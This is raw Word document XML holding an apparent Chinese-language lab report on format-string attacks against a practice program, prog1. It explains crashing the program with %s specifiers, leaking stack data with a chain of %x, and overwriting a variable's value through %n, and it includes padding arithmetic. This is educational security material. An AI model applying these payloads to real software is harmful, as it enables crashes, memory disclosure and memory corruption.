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4533" w14:textId="6ED429D9" w:rsidR="00694E9A" w:rsidRDefault="00694E9A" w:rsidP="00E778AF">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00694E9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00694E9A">
        <w:t>1：针对prog1，完成以下任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5692450A" w14:textId="2AD3A246" w:rsidR="00694E9A" w:rsidRDefault="00694E9A" w:rsidP="00E778AF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C63629">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>使得 prog1 崩溃；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2803268B" w14:textId="77777777" w:rsidR="00ED1F7B" w:rsidRPr="00ED1F7B" w:rsidRDefault="00ED1F7B" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1F7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>●</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED1F7B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">For each %s, it fetches a value where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED1F7B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>va_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED1F7B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> points to and advances </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED1F7B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>va_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED1F7B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the next position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5336AB44" w14:textId="266C5C8E" w:rsidR="00A452F8" w:rsidRDefault="00ED1F7B" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1F7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>●</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED1F7B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">As we give %s, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED1F7B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED1F7B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>() treats the value as address and fetches data from that address. If the value is not a valid address, the program crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768D7361" w14:textId="77777777" w:rsidR="00A452F8" w:rsidRPr="00A452F8" w:rsidRDefault="00A452F8" w:rsidP="00A452F8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>由于程序中对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()函数的调用不包含任何可变参数，因此在输入中放进一些格式化规定符，就能使</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()函数的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>va_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>指针移动到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()函数</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>帧之上的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9041FB" w14:textId="77777777" w:rsidR="00A452F8" w:rsidRPr="00A452F8" w:rsidRDefault="00A452F8" w:rsidP="00A452F8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>当程序运行时，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()函数将解析格式化字符串；每当遇到固定符%s，便从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>va_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>指向的位置获取一个值，并移动</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>va_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>到下一个位置，由于格式规定符是%s，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()函数把获取到的值视为一个地址，并打印出该地址的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584009D5" w14:textId="77777777" w:rsidR="00A452F8" w:rsidRPr="00A452F8" w:rsidRDefault="00A452F8" w:rsidP="00A452F8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>问题是，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>va_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A452F8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>指针指向的值并不都是合法地址，它们可能是0（null）、指向受保护的地址或者没有映射到物理地址的虚拟地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E33AC25" w14:textId="6B99402A" w:rsidR="00C63629" w:rsidRDefault="00C63629" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="24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5C85B705" wp14:editId="466622F0">
            <wp:extent cx="5274310" cy="1248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760" w14:textId="77777777" w:rsidR="00ED1F7B" w:rsidRPr="00C63629" w:rsidRDefault="00ED1F7B" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="446F83CC" w14:textId="2E24625D" w:rsidR="00694E9A" w:rsidRPr="00A42231" w:rsidRDefault="00694E9A" w:rsidP="00E778AF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>打印</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>上数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D65E4BA" w14:textId="77777777" w:rsidR="00A42231" w:rsidRPr="00A42231" w:rsidRDefault="00A42231" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>●</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Suppose a variable on the stack contains a secret (constant) and we need to print it out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4904A037" w14:textId="77777777" w:rsidR="00A42231" w:rsidRPr="00A42231" w:rsidRDefault="00A42231" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>●</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Use user input: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>x%x%x%x%x%x%x%x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51834681" w14:textId="77777777" w:rsidR="00A42231" w:rsidRPr="00A42231" w:rsidRDefault="00A42231" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>●</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">()prints out the integer value pointed by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>va_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointer and advances it by 4 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D62B0C5" w14:textId="3434AB9D" w:rsidR="00A42231" w:rsidRDefault="00A42231" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>●</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Number of %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> decided by the distance between the starting point of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>va_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A42231">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointer and the variable. It can be achieved by trial and error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58382131" w14:textId="4E270D57" w:rsidR="00A42231" w:rsidRDefault="007166BF" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="24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4B37AD4E" wp14:editId="334A2FCB">
            <wp:extent cx="5274310" cy="1182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F490" w14:textId="77777777" w:rsidR="004F61DB" w:rsidRPr="00A42231" w:rsidRDefault="004F61DB" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0873C980" w14:textId="5AA6CE6A" w:rsidR="00FF42E1" w:rsidRPr="008D434B" w:rsidRDefault="00694E9A" w:rsidP="00E778AF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>改变程序的内存数据：将变量 var 的值，从 0x11223344变成 0x66887799</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8E5CEB" w14:textId="77777777" w:rsidR="008D434B" w:rsidRPr="008D434B" w:rsidRDefault="008D434B" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>●</w:t>
      </w:r>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>%n: Writes the number of characters printed out so far into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F5A26" w14:textId="77777777" w:rsidR="008D434B" w:rsidRPr="008D434B" w:rsidRDefault="008D434B" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>●</w:t>
      </w:r>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hello%n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”,&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>⇒</w:t>
      </w:r>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> When </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>() gets to %n, it has already printed 5 characters, so it stores 5 to the provided memory address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44820ED0" w14:textId="77777777" w:rsidR="008D434B" w:rsidRPr="008D434B" w:rsidRDefault="008D434B" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>●</w:t>
      </w:r>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">%n treats the value pointed by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>va_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointer as a memory address and writes into that location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440A4FDE" w14:textId="1EBBB679" w:rsidR="008D434B" w:rsidRDefault="008D434B" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>●</w:t>
      </w:r>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Hence, if we want to write a value to a memory location, we need to have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D434B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> address on the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225409EA" w14:textId="7F4DCDD4" w:rsidR="00337EFE" w:rsidRDefault="00337EFE" w:rsidP="00E778AF">
      <w:pPr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连续的6个%x输出仍然是0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11223344</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182A741B" w14:textId="54DEFED5" w:rsidR="00BF4ADF" w:rsidRDefault="00337EFE" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="24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4315D6C5" wp14:editId="716408F8">
            <wp:extent cx="5274310" cy="1407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17A9" w14:textId="7DB5E2EC" w:rsidR="00B36357" w:rsidRDefault="00226BD3" w:rsidP="00E778AF">
      <w:pPr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尝试使用</w:t>
      </w:r>
      <w:r w:rsidR="00631685">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5个%x和1个%n</w:t>
      </w:r>
      <w:r w:rsidR="00631685">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00631685">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>恰好成功修改：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08048C2E" w14:textId="009125E2" w:rsidR="00C30279" w:rsidRDefault="00C30279" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="24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11F7667B" wp14:editId="320F5C17">
            <wp:extent cx="5274310" cy="2216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3C06" w14:textId="4CA7FB73" w:rsidR="00045701" w:rsidRDefault="00224FA7" w:rsidP="00224FA7">
      <w:pPr>
        <w:spacing w:line="24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6655A0" wp14:editId="78861B03">
            <wp:extent cx="3030121" cy="23281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20" cy="23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1A7F" w14:textId="28E6200A" w:rsidR="00045701" w:rsidRDefault="00045701" w:rsidP="004A4DDA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B198E1" w14:textId="4197754B" w:rsidR="00045701" w:rsidRDefault="004A4DDA" w:rsidP="00E778AF">
      <w:pPr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0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>x66887799-</w:t>
      </w:r>
      <w:r w:rsidR="00AC4FA1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00AC4FA1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>*8</w:t>
      </w:r>
